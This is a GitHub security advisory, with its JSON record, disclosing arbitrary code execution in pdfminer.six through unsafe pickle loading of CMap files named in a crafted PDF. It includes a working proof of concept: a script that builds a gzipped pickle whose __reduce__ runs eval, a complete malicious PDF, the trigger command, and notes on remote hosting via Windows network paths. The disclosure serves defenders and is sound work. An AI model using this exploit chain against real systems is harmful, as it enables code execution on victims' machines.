ghsa-wf5f-4jwr-ppcp
Vulnerability from github
Published
2025-11-07 20:52
Modified
2025-11-07 20:52
Summary
Arbitrary Code Execution in pdfminer.six via Crafted PDF Input
Details

Summary

pdfminer.six will execute arbitrary code from a malicious pickle file if provided with a malicious PDF file. The CMapDB._load_data() function in pdfminer.six uses pickle.loads() to deserialize pickle files. These pickle files are supposed to be part of the pdfminer.six distribution stored in the cmap/ directory, but a malicious PDF can specify an alternative directory and filename as long as the filename ends in .pickle.gz. A malicious, zipped pickle file can then contain code which will automatically execute when the PDF is processed.
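The invariant described above, that a CMap pickle should only ever be read from the bundled cmap/ directory, can be expressed as a path containment check. The following is a minimal sketch under stated assumptions, not the upstream fix: the helper name `is_inside_cmap_dir` and the install path are hypothetical.

```python
import os.path


def is_inside_cmap_dir(cmap_dir: str, filename: str) -> bool:
    """Return True only if cmap_dir/filename resolves to a path under cmap_dir."""
    base = os.path.realpath(cmap_dir)
    # os.path.join discards `base` when `filename` is absolute, so the
    # resolved candidate has to be compared against `base` afterwards.
    candidate = os.path.realpath(os.path.join(base, filename))
    try:
        return os.path.commonpath([base, candidate]) == base
    except ValueError:
        # Raised on Windows when the two paths are on different drives.
        return False


CMAP_DIR = "/opt/app/pdfminer/cmap"  # hypothetical install location
print(is_inside_cmap_dir(CMAP_DIR, "H.pickle.gz"))
print(is_inside_cmap_dir(CMAP_DIR, "/pdfs/malicious.pickle.gz"))
print(is_inside_cmap_dir(CMAP_DIR, "../../secrets.pickle.gz"))
```

Only the first call refers to a file inside the directory; the absolute path and the `..` traversal both resolve elsewhere and are rejected.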

Details

```python
# Vulnerable code in pdfminer/cmapdb.py:233-246
def _load_data(cls, name: str) -> Any:
    name = name.replace("\0", "")  # Insufficient sanitization
    filename = "%s.pickle.gz" % name
    # ... path construction ...
    path = os.path.join(directory, filename)  # If filename is an absolute path, directory is ignored
    # ...
    return type(str(name), (), pickle.loads(gzfile.read()))  # Unsafe deserialization
```
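The comment about absolute paths is the crux of the path handling problem. As a small illustration, the snippet below uses `posixpath` (the POSIX flavour of `os.path`) so that it behaves the same on any OS; the directory name is a hypothetical placeholder.

```python
import posixpath

CMAP_DIR = "/site-packages/pdfminer/cmap"  # hypothetical directory

# A relative filename stays under the directory.
print(posixpath.join(CMAP_DIR, "H.pickle.gz"))
# -> /site-packages/pdfminer/cmap/H.pickle.gz

# An absolute filename replaces everything that came before it.
print(posixpath.join(CMAP_DIR, "/pdfs/malicious.pickle.gz"))
# -> /pdfs/malicious.pickle.gz
```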

An attacker can:

1. Create a malicious PDF with a CMap reference like /malicious
2. Place a malicious pickle file at /malicious.pickle.gz
3. When the PDF is processed, pdfminer loads and deserializes the malicious pickle
4. The pickle deserialization can execute arbitrary Python code
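The last step works because a pickle stream can name any importable callable to be invoked while loading. The harmless sketch below illustrates the mechanism with the built-in `sorted`; the class name is made up for the example.

```python
import pickle


class NotWhatItSeems:
    def __reduce__(self):
        # Tells pickle: "to rebuild me, call sorted([3, 1, 2])".
        return (sorted, ([3, 1, 2],))


blob = pickle.dumps(NotWhatItSeems())
restored = pickle.loads(blob)  # sorted(...) is called during loading
print(type(restored).__name__, restored)
# -> list [1, 2, 3]
```

The loader never checks that the callable is related to the original class, so whoever writes the pickle file decides what runs when it is read.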

POC

Malicious PDF

Create a PDF with a malicious CMAP entry:

```
5 0 obj
<<
/Type /Font
/Subtype /Type0
/BaseFont /MaliciousFont-Identity-H
/Encoding /#2Fpdfs#2Fmalicious
/DescendantFonts [6 0 R]
>>
endobj
```

Here the /Encoding points to /pdfs/malicious. Pdfminer will append the extension .pickle.gz to this filename. Place the PDF in a file called /pdfs/malicious.pdf.
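In a PDF name object, `#` followed by two hexadecimal digits encodes a single byte, which is how `#2F` becomes `/`. The decoder below is a simplified sketch for illustration only; it is not pdfminer's parser, and `decode_pdf_name` is a hypothetical helper.

```python
import re


def decode_pdf_name(raw: str) -> str:
    """Expand #xx hex escapes in the body of a PDF name (after the leading slash)."""
    return re.sub(r"#([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), raw)


name = decode_pdf_name("#2Fpdfs#2Fmalicious")
print(name)                 # -> /pdfs/malicious
print(name + ".pickle.gz")  # -> /pdfs/malicious.pickle.gz
```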

Malicious Pickle

Create a malicious, zipped pickle to execute. For example, with this Python script:

```python
#!/usr/bin/env python3
import pickle
import gzip

def create_demo_pickle():
    print("Creating demonstration pickle file...")

    # Create payload that executes code AND returns a dict (as pdfminer expects)
    class EvilPayload:
        def __reduce__(self):
            # This function will be called during unpickling
            code = "print('Malicious code executed.') or exit(0) or {}"
            return (eval, (code,))

    demo_cmap_data = EvilPayload()

    # Create the pickle file that the path traversal would access
    target_path = "./malicious.pickle.gz"

    try:
        with gzip.open(target_path, 'wb') as f:
            pickle.dump(demo_cmap_data, f)
        print(f"✓ Created demonstration pickle file: {target_path}")
        return target_path

    except Exception as e:
        print(f"✗ Error creating pickle file: {e}")
        return None

if __name__ == "__main__":
    create_demo_pickle()
```

This will create a harmless, zipped pickle file that will display "Malicious code executed." then exit when deserialized. Put the file in /pdfs/malicious.pickle.gz.

Test

Install pdfminer.six and run pdf2txt.py /pdfs/malicious.pdf. Instead of processing the PDF as normal, you should see the output:

$ pdf2txt.py malicious.pdf
Malicious code executed.

Impact

If pdfminer.six processes a malicious PDF which points to a zipped pickle file under the control of an attacker, the result is arbitrary code execution on the victim's system. An attacker could execute the Python code of their choosing with the permissions of the process running pdfminer.six.

The difficulty of achieving this depends on the OS; see below.

Linux, macOS - harder to exploit

On Linux-like systems only files on the filesystem can be resolved. An attacker would need to supply the malicious PDF for processing, and the malicious pickle file would also need to be present on the target system at a location the attacker already knows, because that path must be written into the PDF itself. Even if the attacker delivers the PDF and the pickle file together, they usually cannot know in advance the full path at which the pickle file will be stored. In many cases this makes exploitation difficult or impossible. However:

  • An attacker may find a way to write files to a known location on the target system or
  • The system in question may, by design, read files from a known location such as a network share designated for PDF ingestion.

Overall, there is generally less risk on a Linux or Linux-like system.

Windows - easier to exploit

Windows paths can specify network locations, e.g. WebDAV or SMB. This means that an attacker could host the malicious pickle remotely and specify a path to it in the PDF. Since there is no need to get the malicious pickle file onto the target system, exploitation is easier on a Windows OS.
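The effect of a network path on the join can be checked on any OS with `ntpath`, the Windows flavour of `os.path`. This is only an illustration of the path rules: the install directory and the UNC host and share names are hypothetical.

```python
import ntpath  # Windows path rules, importable on any OS

CMAP_DIR = r"C:\Python\Lib\site-packages\pdfminer\cmap"  # hypothetical
remote = r"\\attacker.example\share\malicious.pickle.gz"  # hypothetical UNC path

# A UNC path counts as absolute, so the local directory is discarded.
print(ntpath.isabs(remote))
print(ntpath.join(CMAP_DIR, remote))
```

The joined result is the UNC path itself, so opening it would fetch the file from the remote share rather than from the local cmap directory.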

Appendix

A complete, malicious PDF is provided here. A dockerized POC is available upon request.

```
%PDF-1.4
1 0 obj
<<
/Type /Catalog
/Pages 2 0 R
>>
endobj

2 0 obj
<<
/Type /Pages
/Kids [3 0 R]
/Count 1
>>
endobj

3 0 obj
<<
/Type /Page
/Parent 2 0 R
/MediaBox [0 0 612 792]
/Contents 4 0 R
/Resources
<<
/Font
<<
/F1 5 0 R
>>
>>
>>
endobj

4 0 obj
<<
/Length 44
>>
stream
BT
/F1 12 Tf
100 700 Td
(Malicious PDF) Tj
ET
endstream
endobj

5 0 obj
<<
/Type /Font
/Subtype /Type0
/BaseFont /MaliciousFont-Identity-H
/Encoding /#2Fpdfs#2Fmalicious
/DescendantFonts [6 0 R]
>>
endobj

6 0 obj
<<
/Type /Font
/Subtype /CIDFontType2
/BaseFont /MaliciousFont
/CIDSystemInfo
<<
/Registry (Adobe)
/Ordering (Identity)
/Supplement 0
>>
/FontDescriptor 7 0 R
>>
endobj

7 0 obj
<<
/Type /FontDescriptor
/FontName /MaliciousFont
/Flags 4
/FontBBox [-1000 -1000 1000 1000]
/ItalicAngle 0
/Ascent 1000
/Descent -200
/CapHeight 800
/StemV 80
>>
endobj

xref
0 8
0000000000 65535 f
0000000009 00000 n
0000000058 00000 n
0000000115 00000 n
0000000274 00000 n
0000000370 00000 n
0000000503 00000 n
0000000673 00000 n
trailer
<<
/Size 8
/Root 1 0 R
>>
startxref
871
%%EOF
```



{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "pdfminer.six"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "20251107"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-11-07T20:52:24Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\n\npdfminer.six will execute arbitrary code from a malicious pickle file if provided with a malicious PDF file. The `CMapDB._load_data()` function in pdfminer.six uses `pickle.loads()` to deserialize pickle files. These pickle files are supposed to be part of the pdfminer.six distribution stored in the `cmap/` directory, but a malicious PDF can specify an alternative directory and filename as long as the filename ends in `.pickle.gz`. A malicious, zipped pickle file can then contain code which will automatically execute when the PDF is processed.\n\n### Details\n\n```python\n# Vulnerable code in pdfminer/cmapdb.py:233-246\ndef _load_data(cls, name: str) -\u003e Any:\n    name = name.replace(\"\\0\", \"\")  # Insufficient sanitization\n    filename = \"%s.pickle.gz\" % name\n    # ... path construction ...\n    path = os.path.join(directory, filename) # If filename is an absolte path, directory is ignored\n    # ...\n    return type(str(name), (), pickle.loads(gzfile.read()))  # Unsafe deserialization\n```\n\nAn attacker can:\n1. Create a malicious PDF with a CMap reference like `/malicious`\n2. Place a malicious pickle file at `/malicious.pickle.gz`\n3. When the PDF is processed, pdfminer loads and deserializes the malicious pickle\n4. The pickle deserialization can execute arbitrary Python code\n\n### POC\n\n#### Malicious PDF\n\nCreate a PDF with a malicious CMAP entry:\n\n```\n5 0 obj\n\u003c\u003c\n/Type /Font\n/Subtype /Type0\n/BaseFont /MaliciousFont-Identity-H\n/Encoding /#2Fpdfs#2Fmalicious\n/DescendantFonts [6 0 R]\n\u003e\u003e\nendobj\n```\n\nHere the /Encoding points to `/pdfs/malicious`. Pdfminer will append the extension `.pickle.gz` to this filename. Place the PDF in a file called `/pdfs/malicious.pdf`.\n\n#### Malicious Pickle\n\nCreate a malicious, zipped pickle to execute. 
For example, with this Python script:\n\n```python\n#!/usr/bin/env python3\nimport pickle\nimport gzip\n\ndef create_demo_pickle():\n    print(\"Creating demonstration pickle file...\")\n\n    # Create payload that executes code AND returns a dict (as pdfminer expects)\n    class EvilPayload:\n        def __reduce__(self):\n            # This function will be called during unpickling\n            code = \"print(\u0027Malicious code executed.\u0027) or exit(0) or {}\"\n            return (eval, (code,))\n\n    demo_cmap_data = EvilPayload()\n\n    # Create the pickle file that the path traversal would access\n    target_path = \"./malicious.pickle.gz\"\n\n    try:\n        with gzip.open(target_path, \u0027wb\u0027) as f:\n            pickle.dump(demo_cmap_data, f)\n        print(f\"\u2713 Created demonstration pickle file: {target_path}\")\n        return target_path\n\n    except Exception as e:\n        print(f\"\u2717 Error creating pickle file: {e}\")\n        return None\n\nif __name__ == \"__main__\":\n    create_demo_pickle()\n```\n\nThis will create a harmless, zipped pickle file that will display \"Malicious code eecuted.\" then exit when deserialized. Put the file in `/pdfs/malicious.pickle.gz`.\n\n#### Test\n\nInstall pdfminer.six and run `pdf2text.py /pdfs/malicious.pdf`. Instead of processing the PDF as normal you should see the output:\n\n```\n$ pdf2txt.py malicious.pdf\nMalicious code executed!\n```\n\n### Impact\n\nIf pdfminer.six processes a malicious PDF which points to a zipped pickle file under the control of an attacker the result is arbitrary code execution on the victim\u0027s system. An attacker could execute the Python code of their chosing with the permissions of the process running pdfminer.six.\n\nThe difficulty in achieving this depends on the OS, see below.\n\n#### Linux, MacOS - harder to exploit\n\nOn Linux-like systems only files on the filesystem can be resolved. 
An attacker would need to provide the malicious PDF for processing *and* the malicious pickle file would need to be present on the target system in a location that the attacker already knows, since it needs to be set in the PDF itself. In many cases this will be difficult to exploit because even if the attacker provides both the PDF and the pickle file together, there would be no way to know in advance which full path to the pickle file to specify. In many cases this would make exploitation difficult or impossible. However:\n\n* An attacker may find a way to write files to a known location on the target system or\n* The system in question may, by design, read files from a known location such as a network share designated for PDF ingestion.\n\nOverall, there is generally less risk on a Linux or Linux-like system.\n\n#### Windows - easier to exploit\n\nWindows paths can specify network locations e.g. WebDAV, SMB. This means that an attacker could host the malicious pickle remotely and specify a path to the it in the PDF. Since there is no need to get the malicious pickle file on to the target system, exploitation is easier on a Windows OS.\n\n### Appendix\n\nA complete, malicious PDF is provided here. 
A dockerized POC is available upon request.\n\n```\n%PDF-1.4\n1 0 obj\n\u003c\u003c\n/Type /Catalog\n/Pages 2 0 R\n\u003e\u003e\nendobj\n\n2 0 obj\n\u003c\u003c\n/Type /Pages\n/Kids [3 0 R]\n/Count 1\n\u003e\u003e\nendobj\n\n3 0 obj\n\u003c\u003c\n/Type /Page\n/Parent 2 0 R\n/MediaBox [0 0 612 792]\n/Contents 4 0 R\n/Resources\n\u003c\u003c\n/Font\n\u003c\u003c\n/F1 5 0 R\n\u003e\u003e\n\u003e\u003e\n\u003e\u003e\nendobj\n\n4 0 obj\n\u003c\u003c\n/Length 44\n\u003e\u003e\nstream\nBT\n/F1 12 Tf\n100 700 Td\n(Malicious PDF) Tj\nET\nendstream\nendobj\n\n5 0 obj\n\u003c\u003c\n/Type /Font\n/Subtype /Type0\n/BaseFont /MaliciousFont-Identity-H\n/Encoding /#2Fpdfs#2Fmalicious\n/DescendantFonts [6 0 R]\n\u003e\u003e\nendobj\n\n6 0 obj\n\u003c\u003c\n/Type /Font\n/Subtype /CIDFontType2\n/BaseFont /MaliciousFont\n/CIDSystemInfo\n\u003c\u003c\n/Registry (Adobe)\n/Ordering (Identity)\n/Supplement 0\n\u003e\u003e\n/FontDescriptor 7 0 R\n\u003e\u003e\nendobj\n\n7 0 obj\n\u003c\u003c\n/Type /FontDescriptor\n/FontName /MaliciousFont\n/Flags 4\n/FontBBox [-1000 -1000 1000 1000]\n/ItalicAngle 0\n/Ascent 1000\n/Descent -200\n/CapHeight 800\n/StemV 80\n\u003e\u003e\nendobj\n\nxref\n0 8\n0000000000 65535 f\n0000000009 00000 n\n0000000058 00000 n\n0000000115 00000 n\n0000000274 00000 n\n0000000370 00000 n\n0000000503 00000 n\n0000000673 00000 n\ntrailer\n\u003c\u003c\n/Size 8\n/Root 1 0 R\n\u003e\u003e\nstartxref\n871\n%%EOF\n```",
  "id": "GHSA-wf5f-4jwr-ppcp",
  "modified": "2025-11-07T20:52:24Z",
  "published": "2025-11-07T20:52:24Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/pdfminer/pdfminer.six/security/advisories/GHSA-wf5f-4jwr-ppcp"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pdfminer/pdfminer.six/commit/b808ee05dd7f0c8ea8ec34bdf394d40e63501086"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/pdfminer/pdfminer.six"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Arbitrary Code Execution in pdfminer.six via Crafted PDF Input"
}
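The affected range in the record above runs from the first release up to, but not including, 20251107. A minimal sketch of checking a version string against that range follows; it assumes versions are plain YYYYMMDD-style integers, and `is_affected` and the sample inputs are illustrative only.

```python
FIXED_VERSION = 20251107  # "fixed" event in the advisory's affected range


def is_affected(installed_version: str) -> bool:
    """Return True if a YYYYMMDD-style version predates the fixed release."""
    # int() raises ValueError for version strings that are not purely numeric.
    return int(installed_version) < FIXED_VERSION


print(is_affected("20250506"))  # -> True
print(is_affected("20251107"))  # -> False
```

The installed version string can be obtained with `importlib.metadata.version("pdfminer.six")` from the standard library.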

